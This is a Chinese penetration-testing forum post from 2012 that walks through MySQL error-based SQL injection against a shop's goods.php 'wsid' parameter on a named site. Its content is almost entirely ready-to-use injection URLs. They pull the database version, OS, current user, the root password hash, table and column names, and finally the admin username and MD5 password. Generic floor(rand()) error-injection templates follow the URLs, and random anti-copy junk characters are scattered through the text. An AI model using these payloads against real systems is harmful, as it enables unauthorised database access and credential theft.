找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2143|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号
1 U/ G2 j3 U2 c* jhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
" f% p$ V6 o( P8 g  V
4 S  x' X" R: A* S" S' w9 v判断系统- B! b( n: F& R& I$ p
+ k; |: c3 M8 |0 R+ n( Y
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23% |5 u% h8 T% |( m4 ~

/ z% D# V6 r, J/ [* O9 b6 r
5 O# X. k8 |' o! {/ N1 C& G# k2 q$ m7 j5 H5 s5 f% ]9 e
当前 user()" ^2 ]! ?3 ^8 r- ^  i6 S
5 b, M& R; i; t  k, b# s
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
! A  D0 a  ]5 Y9 M9 R, A0 P, r& a/ G9 b2 q

# P) Y8 `% u, C1 t. m8 N8 y! x# p2 O; r3 w1 G4 v  y% w) S
当前 database()
8 v( K; ?/ ^$ |http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23, \% j6 p$ ?2 v% v
' {6 l, I. F6 R# s. X
. m' j& w5 g3 ?3 B% J5 ~  D
/ ]7 Y% X- ~3 `% D. }0 \1 p0 g
% q' t6 K% C* e" c+ b& Q
root hash7 ^$ y( S/ o1 W+ `
) G) G0 I: P. r/ s3 m
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
$ S/ e; M8 H. I" m" j$ P1 v0 I, X# {" b8 d+ F% l) E

, _, u8 z! j9 O7 p
; a2 U7 r8 |+ i/ z: E; L7 \5 x当前 数据库表名
0 M, d' |7 q  h' {6 O: C' r% D) m' ~0 B! X
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
4 b" \- b$ ~1 d- R; z$ K. O$ U  v2 t7 Q4 S' Z6 K+ H
% L9 v1 q- L% K7 N8 a6 p+ u" I

- O& y! _5 n9 Q' y# y- q8 p" J5 ]当前 数据库 user_name 字段
- E' [1 W4 X! V$ t) S. {0 L6 W6 i5 O3 p4 t% K6 \- b
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
, f1 v$ s8 r* ?6 A# r, _1 R
* H3 D: O9 Z6 p: H/ F, O当前 数据库 字段 password8 ?+ M: Z0 \4 M6 {/ w! b0 |+ x/ h; V6 k. `
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
6 U) `) \9 c  m: t
- D5 H4 s) C  i' w
, u8 k& t8 e( q# [
4 f; R1 {% |. k7 d& c获得 admin passwd(md5)
- ~4 c+ e% w3 s6 K% r2 N" @0 g4 N
/ v, }7 t3 ~" E) t. g( f) z/ L
1 _( W, J! ~+ [( ]1 P( E& ~http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23: x, k, k. H$ X! V- s9 q$ r

( Y: ~* H& j: q% Z: T2 q0 a报错注射& M% D+ {# A4 t$ N
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
2 D& q% Z3 b# Z, \
8 E# Q% t( y3 E$ o0 ESELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)4 T- D; _! _) a) B% U

. w4 `7 y. b5 tand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表